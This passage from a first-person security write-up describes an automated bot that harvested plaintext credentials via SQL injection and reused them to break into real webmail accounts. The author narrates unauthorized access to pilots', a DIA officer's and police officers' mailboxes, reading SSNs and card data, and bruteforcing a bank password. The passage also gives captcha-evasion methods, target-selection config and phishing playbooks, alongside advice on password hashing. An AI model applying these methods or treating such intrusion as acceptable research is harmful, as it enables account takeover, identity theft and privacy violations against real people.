to me at the time - while sitting there in the hard chair looking at my 
laptop's display reading the ID records - after about half an hour lecture 
(I know... I can't help I'm a slow thinker) I've realized I'm not looking on 
a computer generated dictionary based passwords, given randomly by the web 
application upon the registration - but on the actual VOLUNTARILY PROVIDED 
users sensitive keywords, stored without any kind of encryption, keywords 
with which every particularly asked person wanted to protect its account. 
That, along with the fact that 2 columns on the left from the password field 
in the document lay also voluntarily entered contact email address, began to 
form that biggest question that haven't stopped driving my mind crazy ever 
since: how many of those poor unaware people entered their email address 
aside with the very password OPENING IT right into the vulnerable, browser 
accessible database system...

That was actually the first time I stood before an option of unauthorized 
email access. But since I was already, kinda "fallen researcher" whose 
crawling-code was performing sth like 1000 unauthorized penetration tests of 
different systems a day - my conscience didn't actually stand a chance...
Copy-pasting first randomly chosen email/password into the mail portal login 
page and ... I've had an authenticated yahoo mail account session in front 
of me.

Ten minutes later I knew the owner was a commercial aircraft pilot working 
for a US based airlines, holding pilot license for ERJ-170 / ERJ-190 
aircrafts. I had his license number along with the FAA issued pilot license 
scans in high resolution (saved on his mailbox in 'sent' box), his SSN 
number along with his 401K detailed form sent to an employer and credentials 
to access his current funds state and finally an FAA's issued medical 
certificate scan informing that he should wear corrective lenses.
But hey! That was just the first email/pwd combo from the list I've used - 
it was obvious that it must have been just a fluke. And since getting into 
some random email accounts and snooping through people's life was not a kind 
of fun I prefer as a researcher I've decided to focus back on the goal: the 
numbers behind the password matching attack vector. Until the rest of the 
day I've been trying to manualy indentify number of matching/not matching 
email credential combos, at least for some small part of the entire list.
Approximately 3 on every 10 passwords tested matched.
Some of them needed to be concatenated with '1' or '2' digit (either at the 
begin or end of the password), some of had to be shortened, removing the 
numerical suffixes (ex: 'bart1969' was the DB password - giving us 
additionaly the victims DOB for free - and the simple 'bart' keyword guarded 
the email account). Somewhere after the makeshift lunch I've run into a 
hotmail account which happened to belong to a Delta Airlines pilot. That was 
THE founding that actually changed my mind and let me decide to continue the 
project. After quick search through the pilot's mail account I've noticed a 
correspondence with the DA's IT branch, containing another pair of 
credentials - a private Delta Airlines pilot web account (extranet) 
login/password and a link to DA login portal (connect.delta.com), sent by 
the IT branch after the pilot began his work for DA.
He didn't deleted the message (and why would he? - after all we all have a 
weak memory) leaving it on his private email account - it is not the case 
now to wonder why didn't DA provide him with an internal business mailbox 
restricted to be accessible ONLY from a safe intranet or using IT provided 
asymmetric enc enabled smart-cards, and finally why did they allow sending 
such a sensitive information to a private email account. It is however the 
case of what online services could have been accessed through the DA 
electronic accounts. Let's just say one of the options that the system 
provided to a user(pilot) was downloading airport specific security 
information and accessing FBI issued documents concerning aerial terrorist 
threat awarness.

At the end of that day I've made up my mind: I will not bury the project 
after just the first 2 weeks of the research but I'll try to make it grow to 
bring up a fully automated code able to perform automaticaly every single 
step I've done to get where I was at the moment. The goal was simple: to 
find out what numbers 'in the wild' are behind every part of this particular 
multilevel attack vector and moreover - what could be its possible 
mutations.

Later, the next morning I identified another DA's pilot email account within 
the aviation company customer list downloaded the last day, hosted also on 
Hotmail. That account also contained the email, sent from IT, with internal 
DA pilot account login credentials. Also multiple other FAA's system 
accounts were identified, provided for pilot training / career path 
developement.

The equation is quite simple: if just one, single system you have ever 
logged into (or have account(s) in), by giving it your universal password 
scheme AND a contact email, happens to be vulnerable to a database access 
attack vector: you may consider any other of your electronic password 
protected accounts in different digital systems as compromised - often EVEN 
if they haven't been protected by the same secret keyword pattern.

When the attacker gains knowledge about just a nickname/loginname/id held by 
the victim to access a heavier protected information system using changeable 
password interface (an online bank, business/service online account) it 
could be all he needs to compromise the account. Afterall, he knows already 
that the person used same password at least twice so it's quite possible he 
or she could have used its combination pretty everywhere, isn't it? It is 
good however to hear voices of security aware internet forum users 
consciously admitting to separate their common passwords into few different 
pattern groups: one for home/local computer accounts, another for private 
email accounts and finally a different one for most critical accounts, the 
ones provided by the office/service and the online financial services. 
Additionally it would be a wise practice to try not to connect ANY email 
account, either private or business, by the same password pattern coherence. 
After all, you can never tell much about the security of the particular web 
portal you are about to register a new account in. After inputing your 
contact email address needed by the particular service registration process 
it is crucial to use a completely different secret word / password scheme 
than the one protecting your mailbox. You will sleep better, knowing that 
after any possible database compromise in future this will be the first and 
the last point the attacker could get while trying to progress in the attack 
using information you provided upon the registration.

A good place for an attacker looking for email hijacking/cracking targets 
could be job seeker portal databases designed for active as well as retired 
military and government service workers. These systems are most often filled 
with a highly sensitive information, including SSN numbers bound to detailed 
personal info, business email addresses, client provided password/secret 
sequences and also officer service performance reports. In fact, this kind 
of data make a best suitable target for rather politicaly motivated 
entities, producing in turn a cyberterror/cyberwarfare based threat to a 
particular government organization or country, than just an another easy 
prey for a common electronic fraud criminal.

Looking at the whole case through the attacker's eyes, you could actually 
try to make a comparison that a particular vulnerable job portal database is 
much similar to a bottle of wine... :)
After penetration has been made, all the compromised email boxes lie opened 
on the intruders table. A particular victim that has registered its account 
on job portal - after getting the first job / switching it to a better one - 
usually advances with its experience and knowledge, leaving however the job 
portal account not updated or even sometimes forgets about it. Additionaly, 
while the email given in the online registration at the portal is usually 
the same email address the victim contacted recruitment office of the new 
job - the attacker can easily identify the new victims occupation as well as 
any email message forwarded by the victim itself between an old email 
address (the portal registered one) and a new business email address. But 
since the victim advanced - its personal info importance as well as 
professional competency along with scope of digital access have gained on 
value - just as an old wine in the 'insecurity basement'. Finaly, right 
after opening the bottle, an intruder by simply linking the facts can 
"learn" the victim from its correspondence stored on differnet subsequently 
opened business/private mailboxes sharing the same password pattern. 
Accessing more critical infrastructure accounts belonging to an attacker - 
by using either known password pattern bruteforcing or "forgotten password" 
reminder services - an attacker can compromise the victim's multiple company 
business accounts, reflecting a victim's career path.

An example of Bot pentested job portal system may reveal a little bit the 
magnitude of possible compromise impact. A portal - designed by a US based 
company explicitly for a retired military and law enforcement officers 
looking for a job in a higher (secret/top secret) security clearance 
requiring civillian companies - was identified by the Bot to contain an 
exploitable server side flaw within the "New Account Registration" 
interface. Most users registered there hold or used to hold a military 
related career path ending with an officer rank. Often they also hold the TS 
security clearance level. The runtime code managed to auto-identify and dump 
the email/password combo records within the database (provided at 
registrtion by the account owners) and passed them to the bot's segment-3 
for further automated password/email matching and mailboxes message contents 
analysis.
Among any other penetrable accounts, it was able to gain access to US Army 
Lt Col's private Hotmail mailbox.
While holding a "Top Secret" clearance, his last occupation - according to a 
detailed unclassified CV stored within the mailbox - was a position of 
Branch Chief in the U.S. Defence Inteligence Agency (DIA). You could ask now 
of course why a guy holding a security crucial position like this, did use 
the same password pattern more than once.
But that's not the point. Everybody uses a password pattern of some kind 
just as everybody has a weak memory (especially me).
There are better questions however: why didn't he deleted the message sent 
to him by the US Embassy in Paris, containing information on a 6 day 
'Ambassador' hotel reservation, that included highly sensitive detailed 
payment information. The data within the embassy's message contained a still 
valid VISA credit card details used during room payment before the 
particular European NATO event, ie. a full 14 digit credit card number, its 
expiration date and what's most weird: the sensitive 3 digit security code 
(CVV2) needed for any online payment authorization. Much better question 
would be: why did the Embassy sent such a sensitive information via an 
email, especialy on a private Hotmail account?

And that's just one example.
Out of about 30 thousand stored mail address/password combos on this portal 
database, out of 800+ different other db_name()'s stored on the particular 
MSSql server and accessible through the flawed ASP interface using the 
shared DB user account, out of about 29 different recruitment companies 
whoose web systems were found vulnerable to database injection attacks by 
the Bot so far.
You do the math...





12. Second Stage Attack Impact And Propagation.
///////////////////////////////////////////////

The mailbox credentials matching attack vector, after just few weeks of 
play, became one of the primary subjects of the research. It has been 
implemented as bot's Segment-3. The attack vector, employed by S1, S2 and S3 
bot segments bound all together, was called for naming purposes simply: 
'SIDECAM' (SQL Injection Driven Email Credentials Active Matching).

In theory, after compromising the victim's mailbox password, a malicious 
attacker may follow different attack propagation paths, depending strictly 
on his goals - being either purely chaotic/destructive, financial or 
politically motivated. Just as the motives behind the attack may differ - 
the final impact of the SIDECAM based final stage compromise may also vary, 
ranging from a sensitive information leak, up to different machine 
compromise, ending with secure intranet infrastructure penetration.
The impact of the final 'SIDECAM' attack stage alone (S3) is in fact the 
impact of a successful password compromise attack against a particular email 
box, either private, business or government provided.

Before launching S3, the gathered Email/Pw pairs were checked against 
password frequency. 40 most frequent passwords (ie: passwords harvested by 
S2 - NOT the passwords indentified as matching their corresponding email 
addreses by S3), within gathered 150K base, sorted by descending frequency, 
were:

123456
1234
12345
12345678
password
test
cancer
pass
fringe
drugs
qwerty
mother
summer
sunshine
soccer
654321
abc123
london
monkey
123456789
sparky
111111
baseball
captain
sailing
letmein
freedom
murphy
fashion
maggie
monaco
tigger
1234567
chocolate
dallas
flower
michelle
pain
shadow
1111

When Bot's S3 was able to go operational (after S2 provided it with enough 
mail credential pairs) it processed first exactly 16344 email/password pairs 
(out of 151595 gathered totally by S2 during its first few week runtime). 
The S3 was configured to target only specific free mail provider accounts: 
Hotmail, Msn, Gmail, AOL, Verizon, Comcast and EarthLink.
After reaching 16344 processed mailbox credential pairs (ie: ones belonging 
to the preconfigured provider pool list), Segment-3 was shut down. It 
matched positively exactly 3127 pairs (ie: ones for which the particular 
password was successfully opening its corresponding email account, accepted 
either by providers POP3/IMAP4 mail server or through S3 implemented HTTP/S 
webmail login interface parametric proxy).

The final "password reusage factor" (PRF), visualizing level of universal 
password usage among the internet users, oscillated through runtime around 
0.15 - 0.24 (shortly speaking: aprroximately 1 on every 4-5 processed email 
owners use the same password scheme for its digital, password protected 
accounts). Then, it should be also mentioned, the PRF's oscilation amplitude 
through the runtime depended at most on 2 factors: the type of the system 
(its infrastructure criticality level, expressed directly in the trust that 
the users have to the system) and the age of the particular S2 compromised 
system (the age of the most recent account created).

The reasoning behind the second factor is rather obvious - for a 10 year old 
portal / web system account we have far lower probability to that the Em/Pw 
combo will still match (it is more probable that the the password has been 
already changed after a compromise (or as a result of users security 
awareness increase) or the account was abandoned / deleted).

The first factor expressed itself most evidently in the case of the 
vulnearable U.S. Department of Justice system. The users here were in most 
US Gov officials, being usually a law enforcement workers. The highest PRF 
factor (around 0.24) was noted in this particular systems case - the highest 
number of Em/Pw combos were found matching by the S3.
Later, apart the free-email-provider S3 runtime, a different S3 test case 
was executed (one, targetting non-free gov provided email account passw 
matching). It resulted accessing multiple email accounts, belonging in most 
to PD officers and Sherrif Dept officers. It's unclear however what was the 
true factor behind the numbers in this particular system case - whether they 
were a result of some kind of "reckless distance" a gov worker has to its 
job ("I don't need to care for every single digital account gov gave me, 
until it's not my bank account") - which however, in this specific systems 
case (DoJ) would be somehow ironic - or rather completely the opposite: 
"while I'm registering the account and entrusting my personal ID and 
password in the hand of gov department that handles peoples security, how 
would it possibly be unsafe and opened to a compromise? - ie: my universal 
password is safe here."

Finally, the runtime results were corelated and compared, showing PRF 
factors for each separate email provider.

ProcessedHotmail = 7070
ProcessedMsn = 792
ProcessedGmail = 3750
ProcessedAOL = 2625
ProcessedVerizon = 308
ProcessedComcast = 996

PositiveHotmail = 1664
PositiveMsn = 184
PositiveGmail = 386
PositiveAol = 490
PositiveVerizon = 45
PositiveComcast = 189

HotmailPosFactor = 0.23
MsnPosFactor = 0.23
GmailPosFactor = 0.10
AolPosFactor = 0.18
VerizonPosFactor = 0.14
ComcastPosFactor = 0.18

Although in my opinion EXTREME CAUTION should be taken before drawing any 
real conclusions based on theese numbers, there is at least one thing 
drawing attention: over twice as much statistical users with positive 
password reusage match for Hotmail and Msn (while treated as two different 
test groups, amazingly, they resulted with the same, highest PRF factor, 
both being corelated by their mutual service provider, ie. Microsoft) as 
statistical Gmail users with positive password reusage match.

There are also questions concerning reasoning behind some protections, 
either security or commercial based, implemented by particular email 
providers. Gmail and Hotmail, for this example, have well implemented 
captcha solution, to verify if the following mailbox auth attempts are 
driven by human (ie: from security reasons). However, if one chooses a POP3 
protocol based mail synchronization, free accessible there for anyone, he 
can easily execute an automated robot code.
In the Yahoo! Mail case, we deal with an opposite situation - since there is 
no free POP3 mail server available to Yahoo Mail free service users, just a 
commercial solution called "Yahoo! Mail Plus", there is no easy way to 
complete an automated POP3 driven password match (when we try and use a POP3 
mail server using particular free-mail Em/Pw pair we will result with 
AUTH-FAILED error, just as the account/password given wouldn't match - 
however when accessed through a yahoo's webmail interface - we could be able 
to log-in successfuly). Since the Yahoo Webmail interface doesn't implement 
any captchas, one could easily execute an automated credential matching code 
just by implementing a HTTPS webmail proxy wrapper.

The second part of this section was focused on the successful SIDECAM attack 
propagation - what could happen AFTER the hostile succeeded with breaching 
our mailbox. Since the further exploitation paths, succeeding unauthorized 
email access, are limited just by an attacker's imagination, we could give a 
try and sketch few most probable courses of action for a hypothetic 
intruder.

The very first thing an arbitrary attacker would probably do after breaching 
the victim's mailbox is enumeration of any other accounts and systems that 
the victim has the access to. One good way to do this would be simply using 
the webmail 'message search' features and looking of any message containing 
words 'password', 'account' or 'login' - theese emails will either contain 
different system registration confirmation credentials, password reminder 
data or any additionaly details revealing the existence or other electronic 
accounts belonging to the victim (social portals, job portals, business or 
service restricted systems, web admins / web developers FTP credentials, 
etc..).

After enumeration of the less critical, low security system accounts (the 
ones which credentials were either already stored wihin the mailbox or could 
have been retrieved successfuly using just their login/id and apriopriate 
send-password remider services), the attacker may focus on stronger 
protected system accounts, like online banking accounts and electronic money 
operation systems.
Lets look at the facts here.
Todays well designed financial assets operations system is a fortress. Or 
should we rather say: it is meant to be a fortress. Most probably, it would 
be one, if both - its defense system operators and its clients - were 
robots.
In the real world however the security of a particular fincial's system 
client depends STRICTLY on his security threat awarness and - what's far 
more important - on the threat imagination he managed to develope.
Lets take a look for example at a common, well secured online account, 
facing a possible related email's credentials compromise. The particular 
online bank provide the account's owner with brute force attempt 
protections, newer allow to send any sensitive data to related email address 
(so the attacker couldn't just simply "email-remind" the account's 
credentials), employes 2- or 3-level password authentication mechanisms, 
separately for cash and non-cash operations (including one-time passwords 
and SMS transaction authorization) and finally harden the password 
forgotten/reset operations with different ID information challenge-response 
reqests.

But as usual, there is one tiny issue in the whole case - no matter how hard 
a security specialists would try, we are just humans - not robots.
Quite often the ammount of ID data embeded within correspondence and 
different sensitive documents found after Bot's reconaissance done on a 
particular mailbox was all the intel the malicious attacker would need to 
perform the bank account password reset. SSN numbers, DoB's, addresses, 
phone numbers, detailed health and service reports, even a secret 
question/answer (universal as well) combo - could have be found on the 
victims mailbox and through it - either within sent and saved CV documents, 
detailed cover letters, business correspondence or the account 
configuration. Also the SMS authorization services can be diverted (by 
resetting/changing SMS number), using the info the attacker could have 
acquired after the mailbox breach.
Finally, what could have been "noticed" during the research, in different 
cases the particular person used its universal password sometimes four times 
and more, in different places (including the email password), in one or 
another form (often concatenating with a number '1' to meet the particular 
password policy's requirements) - so it wasn't also much surprising to find 
that in few cases the very same password protecting mailbox was also 
protecting the particular user's online bank account.
Most surprising however, instead of all the warnings from the banks 
correspondence disclaimers, was to find at user's mailbox a self-forwarded 
message containing either partial or full credentials (UserID/Pw) to access 
a particular web bank account. Even better: one particular person have made 
an email folder named 'my passwords', where he did stored all the "needful" 
sensitive info, including Paypal IDs and aviation portal / systems accounts 
(he was a pilot). It seems that the one thing distinguishing a human from a 
robot is most definitely a weak memory.

The easiest (but less subtle) action an attacker could perform is email 
account hijacking (changing its password, secret question and answer). 
Although it's probably the last thing to do if one wants to keep the 
account's credentials compromise undetected for as long as possible, it 
could make a successful tool for further blackmail and extortion attacks.

Finally lets not forget about the spam robots and automated email spoofing. 
I agree: remote machine hijacking, using malware and exploitation of the 
physical access to victim's email account data along with its contacts 
stored within the host machine email client - is one of the most often ways 
for spammers to obtain both: spam zombie robots and a valid email account 
credentials. But I guess not the only one.

Accounts compromised after an automated SIDECAM attack can make as well an 
effective fuel for any kind of spammers.

Browsing through a compromised's sherrif department mailbox belonging to a 
IT Division Chief (after completed SIDECAM phase on the mentioned earlier 
one of vulnerable Department of Justice systems), I've spotted a message 
describing a recent incident involving spam being sent from one of sheriff's 
dept email accounts. It cautioned the SD's users ONLY for rechecking proper 
AV settings when operating from home machines. However if the leak source 
was not the malware infection of the government worker home machine, but a 
similar SIDECAM-like attack on DoJ - reinstalling an AV or even setting up a 
new clean version of OS wouldn't make a difference for the attacker who 
targeted the particular sheriff's department account through the attack, as 
the source of the email credentials compromise was both: the leaky DoJ 
system and the password reusage vulnerability.

The previous example introduces second, far more interesting group of 
attacker's courses of action, involving social engineering mechanisms and - 
unlike the spambots - targetting precise, high value targets (chosen by a 
specific profile attacker, being for example financialy or politicaly 
motivated).
Since this type of attack to be successful requires from an attacker a 
proper study of the victim's profile (by using for example the info gathered 
from its correspondence and social portal accounts), it cannot be automated 
(I mean: at least until 2029 you will need a human to deceive a human :)

Lets focus at start on an attack employing spoofing of identity of 
compromised email's account owner (lets call him: "victim1") and targetting 
specific person ("victim2") from the breached mailbox's contacts list.
A hypothetic attacker, after checking victim1's contacts (by either 
analysing mailbox contents downloaded using POP3/IMAP or simply accessing 
the contacts list using the particular webmail interface) will begin with 
building a personal identity pattern for the victim2 including every piece 
of info he could found: what he/she likes, which web type of sites it visits 
(has accounts in), current and previous occupation, interests/preferences, 
what kind of information is exchanged between contact and mailbox owner, 
what is the highest priority matter to victim2 at the moment, and so on. 
Following that, an email must be forged employing stolen identity intel, 
containing as much personal data as possible to render the message credible.

The attacker's goal will be to urge the remote mailbox owner (victim2) to 
response "positively" (according to the attackers objectives), either by:
- visiting attacker controlled web site hosting malicious remote attack 
code,
- launch attached script/binary,
- reveal a sensitive information.
The possible impact of such attack is obviously compromise of victim2's 
client machine and sensitive information access.

A specific mutation of this attack vector, not demanding from the attacker 
however execution a successful password matching SIDECAM attack, could be 
exploited in so called "spear phishing" scheme. It involves a phishing 
attack with one major difference to common phishing - the fact that the 
attacker already knows that the owner of every email address within a 
spammed list is in possession of the account in the particular system 
(social portal, online banking system, particular corporation's employee 
restricted system), account that the attacker is interested of. After 
properly researching the targeted organization the attacker will target the 
precise account type.
Note, that this attack may be launched by an arbitrary attacker after any 
successful database email records harvest, especialy when neither Login nor 
Password data could have been retrieved successfuly by the attacker (were 
properly one-way encrypted for example) and just bare email list and maybe 
some basic ID data was retrieved (like name, phone or address) - this kind 
of data is all the attacker needs to forge a trustworthy, credible message 
pattern and execute a spear phishing attack, targetting for example 
Login/Pwd account combos of the particular system.

Another kind of possible email breach exploitation (either SIDECAM based or 
not) would be inverted (in reference to previous example) identity spoofing, 
ie. the case when the attacker while spoofing some other email identity (for 
example one of victim1's contacts - ie. victim2 in the previous example) 
sends a spoofed message to a controlled (breached) victim1's mailbox, 
exploititng the intel gathered so far through the victim1's email access.
After forging a credible, detailed message, an attacker can execute social 
portal credentials phishing, bank account phishing, aim for victim1's 
sensitive data (ID data/business secrets/service related confidetial data), 
spoofing victim1's company representives (anyone with high enough rank, 
found in contacts or by email analysis) or execute remote execution attack 
by sending malware of any kind the mailbox server operator won't filter out 
(executable / document embeded 0day) authenticating the message with intel 
gathered so far on either victim1 or its spoofed contact, victim2.
Possible impact: compromise of breached mailbox owner's machine (victim1's).

A specific subtype of the above attack type would be the "active 
conversation interception". In this scenario an attacker, basing on the 
mailbox event tracking (analysing any newly opened conversations, awaiting 
answers to victim's question/topic) will try to intercept 
(detect/read/delete) any possibly high priority message (answer awaited by 
the mailbox owner - victim1) forging and sending a spoofed message inducing 
victim1 to either share sensitive information or reponse by executing 
(opening) a malware (exploit) attachment. The more is the conversation 
valued to the victim - the higher the  probability of successful attack.

Most expected to be exploited using this kind of attack would be for example 
resume (CV/cover letters) sent to a remote company and awaiting response, 
conversations with old colegues and family members (but only those for whoom 
this (email) is the only way of communication with victim), a job offer from 
registered job portal (since its most probable the attacker will gain access 
to the job portal using already known victim1's universal password - he will 
also be able to monitor any events within the victim1's job portal profile, 
so any messages FROM the portal after profile updates can be expected high 
priority to victim1), etc.

Another example would be execution of ID phishing attack, spoofing any 
actively (currently) used job portal mail account, with message containing 
link to an attacker controlled ID-data-phishing web site and requiring 
additional, sensitive ID data (service reports / current job involved 
projects / etc) giving false impression of having possibly attractive and 
available job offer.

Certain mutation of that attack scenario would be a phishing attack 
targetting credit card data.
After noticing that the victim has a credit card in his possession and 
recently used it in any online shop (by looking for any possible shop's 
response email messages on victim's mailbox containing succesful purchase 
notification), after interception of the message (deletion) an attacker can 
begin a phishing attack and imitate a shop's CC data update website, similar 
to one that the user has previously registered his card in, requesting CC 
data update, motivating the operation with ex: security reasons and victim's 
shop account validation.

The last interesting way to exploit the unauthorised email account access 
that I've came across during the project was self forwarded attachment 
overriding.
The idea appeared after accessing an email account belonging to a Victoria 
Police Department computer forensics detective. Among investingation 
reports, forensic software FTP account data, and other, service related 
messages, my attention dragged a recently self forwarded message containing 
a zipped instalation version of a cell phone forensics software.
While the only reason of forwarding the installation binary to myself (it 
happened to me few times) is to be able to quickly setup the software on a 
clean machine in new place with just the internet connection - there was a 
quite reasonable assumption that the file would be used (remote executed) in 
the nearest future.
An attacker could exploit that fact and after replacing the recent message 
with one containing altered attachement, ie: the same software installer 
combined with a trojan code.
The resulting impact would be compromise of any machine that the victim1's 
would install the attached program on.

Apart the particular example, any properly conducted, sophisticated social 
engineering attack exploiting a compromised police department email account 
may also result with infection and further penetration of police department 
secure intranet system.

Note: spoofing driven attacks may most likely after relatively short time 
trigger a response message from the target to person which identity has been 
spoofed, with questions about the suspicious message (assuming only that the 
person is highly aware of common security threats), which in turn will 
result in uncovering of the attack, and most likely of the mailbox 
compromise as well, triggering further actions by the victim such as 
compromised machine cleanup. Therefore attackers time-window to utilize 
compromised system will be relatively small.

Lets also not forget that a properly designed, EXTERNALY (internet) 
accessible webmail interface should provide every account holder with 
mailbox login-event IP/Date tracking features, accounting at least few 
previous logins, (Gmail would be one good example of such proper 
implementation).

On the other hand - finding the "source" (eg: a particular credential 
information leak source) of victim's mailbox password compromise is a 
difficult task.
After the problem has been signaled, even if one can assume the compromise 
source was SIDECAM-like attack, it would be hard to point out quickly a 
precise system that after being successfully attacked using SQL Injection 
(or any other data-targeted attack) has become the source of the sensitive 
information leak. The particular victim could hold many accounts in 
different systems - systems that could be old enough to hold multiple, 
different type vulnerabilities.
The affected person might have also forgotten about some of the system 
accounts long time ago (it happened to me few times actually), accounts that 
are still active, or even hadn't been logged into once, trespassing theese 
systems just to "check&leave" there his most precious sensitive information 
(universal password for example). After some of more critical system 
accounts are compromised it may be sometimes practicaly impossible to track 
the origins of the particular victim's password data leak.

I should mention at the end, that all the presented attack patterns above, 
belonging to the second group of attacks (attacks involving social 
engineering) are THEORETIC SCHEMES ONLY, and haven't been executed by me in 
any real situation during project time.





13. Teaching a robot how to "value" its victim.
///////////////////////////////////////////////

Since the 'SIDECAM' attack vector is an example of a randomized-victim 
attack type, to gain most valuable results, an attacker must focus on 
creating a proper parametrization of its code: he must design it in such 
way, it could target ALONE, elasticaly described, most valuable critical 
infrastructure points.

This is all the game of probability and time.

For the SIDECAM attack vector, the point is to generate (for example) google 
search query patterns derived from easily enough configurable regular 
expressions, describing internet system interfaces like for example job 
portals, retired officer portals or any social web application systems 
provided for critical infrastructure workers - the places where most 
experienced people stored willingly their email/password data, unaware of 
the threat.
The strength of this attack vector (assuming a randomized-target attacker), 
is based on the access level given to an attacker by the sensitive data he 
can obtain afterwards, using all the intel and credentials gathered after 
breaching the particular victim mailbox. The more sophisticated victims 
occupation  / higher security clearance / more experienced person - the 
bigger the final attack impact.

Probability works fine in real - after stumbling for few days upon a 
different US .gov domain systems, the bot identified a vulnerable Texas' 
Department of Justice database system developed to support a different US 
DoJ workers with criminal backgroud checking service. The vulnerability 
existed in a 'password reminder' interface. As it could have been predicted, 
most of the registered users there were law enforcement services workers. A 
30000+ user account records MSSQL database were then enumerated and 
selective-dumped, targetting auto-identified login/password/email records. 
The final scanning stage was the segment-3's job. It performed automated 
password validity matching for the selected email/password combos.
The major part of the DoJ's system accounts were registered by the law 
enforcement representatives, that presented their official gov-provided mail 
account addresses upon the registration. Now, since most of the properly 
designed government and military information systems should provide access 
to an email services ONLY from machines belonging to an internal institution 
network (intranet), it is impossible to connect to their login interfaces 
"from outside" or without presenting a valid VPN/HTTPS certificate issued by 
the CA either for the precise user's machine and secured localy by MS's 
DataProtection API or carried by the user on his/her smartcard.
But again: 'most' doesn't make 'every' :)
Relaying again on our new best friends - probability and automation - all we 
need is to properly identify whether a particular mail gov-domain support 
some external POP3/IMAP server or if it provides any external webmail 
interface. The most often used HTTP/S mail domain prefixes/suffixes found 
were: 'mail','webmail', ,exchange', 'owa' and 'email'.
The results that came up after a day of work or so, were lets say, at least 
somewhat unexpected. Several police department and sheriff's department 
email accounts were matched as accessible (DoJ system presented password was 
reused). The email accounts were provided by either US or Canada government 
and included: a deputy sheriff detective, police dispatchers, a computer 
forensics detective, narcotics division detective and information technology 
division chief.




14. Passwords, secrets and the pain of hashing.
///////////////////////////////////////////////

Every 9 on 10 systems that were found vulnerable to ASP/MsSQL SQLi attack by 
the Bot, while holding some form of user password, did not encode the 
sensitive values or hash them in any way, storing them in a plaintext, using 
either 'varchar' or 'nvarchar' SQL type fields.
Less than 5% of compromised systems just encoded sensitive information, 
using mime64 algorithm in most cases, rendering sensitive data easily 
reversible after the DB attack. It was really nice to find manualy once a 
time a secure websystem welcoming the user on the 'new account submission' 
page with message like this:
"For security reasons, your password is stored in an encrypted state in our 
database, which prevents the system (or anyone else) from reverse generating 
your password."

The only way to protect a user provided sensitive data - not only from 
remote attackers, but also from the malicious insiders - is to use strong 
enough, one way, collision resistant encryption algorithm, commonly known as 
hash function. Using up to date hash methods (like SHA-2 for example) 
protects the user before any sensitive data leak, caused wheather by a 
remote intruder breach, authorized employee malicious action or accidental 
data loss.

Probably the most obvious reason behind this "pain of hashing" reflecting 
the numbers, is the kindness and generousity of corporation's programmers to 
support lost users with the extraordinarily powerful feature of password 
reminder.
But, seriously.
I can not speak of if "password reminder" option is simply GOOD or BAD - 
it's not black or white.
But this is a bad policy.
The only thing I could speak of, to be objective, is that the option 
implemented for the "users good" is far less secure than its completely 
reasonable alternative - password reset feature. At first - user password 
plaintext data may be harvested (and decoded) as a result of SQL Injection 
compromise of the vulnearble corporations database. Secondly - the password 
may be intercepted/retrieved by any attacker who gained access to victm's 
email account credentials (exploititng for example a successful SIDECAM 
attack result data). And finally - after breaching a users mailbox account, 
attacker can exploit "password reminder" features of ANY particular system 
that the victim has been registered to and take control of the accounts.

The existence of a password reminders service is in fact a real evidence 
(and the only one the attacker would need) for that the web application 
doesn't use any type of sensitive data (password) hashing but stores the 
data as a plaintext (since for the properly constructed hashing algorithm 
there is no (mathematic) way to "recover" the hash operation input argument 
from the result value).

Going further - in my opinion, at no point to be honest, should be a user 
given the option to provide the remote, critical assets system (like an 
online banking or a official government mailboxes) with ITS OWN password, 
neither during account registration nor at password reset operation. We are 
just humans and human doesn't execute every single policy given, as robot 
does with the scripting code. The password may be to short, it may lack of 
randomness (be vulnerable to brute-force attack) and most of all - after 
possible compromise of the database system it may reveal to much information 
about the "cryptographic inner" of the user. Very short, dictionary based, 
character only password would for example indicate either users's 
recklessness or his unawareness of security threats.

Lets take a real life password example: 'susan1'.
The password has been found to be matching the coresponding email address, 
using SIDECAM attack vector by S3. The password indicates 3 things: first, 
that owner likes susan :) second that most likely he is a male and finally 
most important to an attacker - that (in this specific example) he 
intentionally concatenated word 'susan' with number '1' without being told 
to do so by the remote system (the particular system's password policy 
(email portal) didn't enforced the user to use numbers or special 
characters) which leads us to a conclusion that the user is:
1. Aware of the password complexity attacks and could have used the hybrid 
password to protect one of his more critical assets ie. his mailbox.
2. Uses still approximately short password most probably to easily memorize 
it.
That all together indicates that the user's "security fraze pattern" was 
used to lock his "things" in more than just one place and it could to be 
expected (with a reasonable probability) a combination of word 'susan' and a 
digit most likely ranging between 1-5.
After about an hour of getting known the user better while talking with 
susan1, 2 other accounts could have been accessed - user's second mailbox 
password was pattern-bruteforced and verified to be also the keyword 
'susan1' and the online bank account used (first level of authentication 
only / non-cash operations) by the user was identified to be protected by 
the password 'susan3'.

Another real life example - a Mensa Poland member's emailbox, accessed by 
the Bot was noticed to be protected by the password 'dupa' (meaning: 'ass', 
in Polish language). The conclusion here however was slightly more 
difficoult than in the previous example. The best I could have came up with 
was: the higher the IQ the stranger the password is ...

Definitely the most ironic case however was the AOL's user, who had chosen 
to protect her electronic accounts (including the one within a buggy, SQLi 
targeted portal) along with her AOL email account all together using the 
same password: 'idiot1'.

The unencrypted password records stored at the vulnerable database should 
not be considered afterall as the most critical user's asset to be 
protected. Giving the Bot's gathered system examples, many of them contained 
other sensitive data type stored in plaintext - secret questions and 
answers.
Analysing SIDECAM opened mailboxes, an attacker already knows that the user 
used the single well memorized password in at least two different places.
With a reasonable assumption that the mailbox owner uses also similar 
"secret question" / "answer" strings for stronger protected systems and with 
the help of additional personal information like DoBs, addresses, phones or 
even SSN numbers stored within victims mailbox documents (CVs attached to 
job emails are true personal information mines) - an intruder can try to 
conduct a successful attack against strong protected victim's accounts that 
the attacker is already aware of, after study of the victim.



15. Parametric Data Objectives.
//////////////////////////////

To be able to "tell" the bot which type of data within every penetrated 
database system we are interested in and which is unimportatnt, a simple 
mechanism has been implemented to describe it - "Parametric Data 
Objectives". The idea is to bind the public parts of the targeted data with 
its corresponding private values. For example if we'd like to tell the bot 
to look for any ID Data containing specific secret element (say a SSN 
number) we describe it defining a list of string-patterns both for the 
public and private part. We define a DOP scheme by NAME and then describe 
the lists of Key and SubKey strings to follow this pattern (ie: contain one 
of the Key/SubKey words)

Example from config:

Key = ssn ss_n ssan social_security socialsecurity
SubKey = email name tel addr phone dob year ammount number date time code 
user country

The whole idea is that data keys must be bound to at least one subkey - 
without it accessed data has no value for a particular attacker. Lets say we 
are interested in any table containing Password/Email columns - we need to 
tell the code how a login column name could look like and moreover - what 
different column should it be bound to to, to be valuable. Therefore even if 
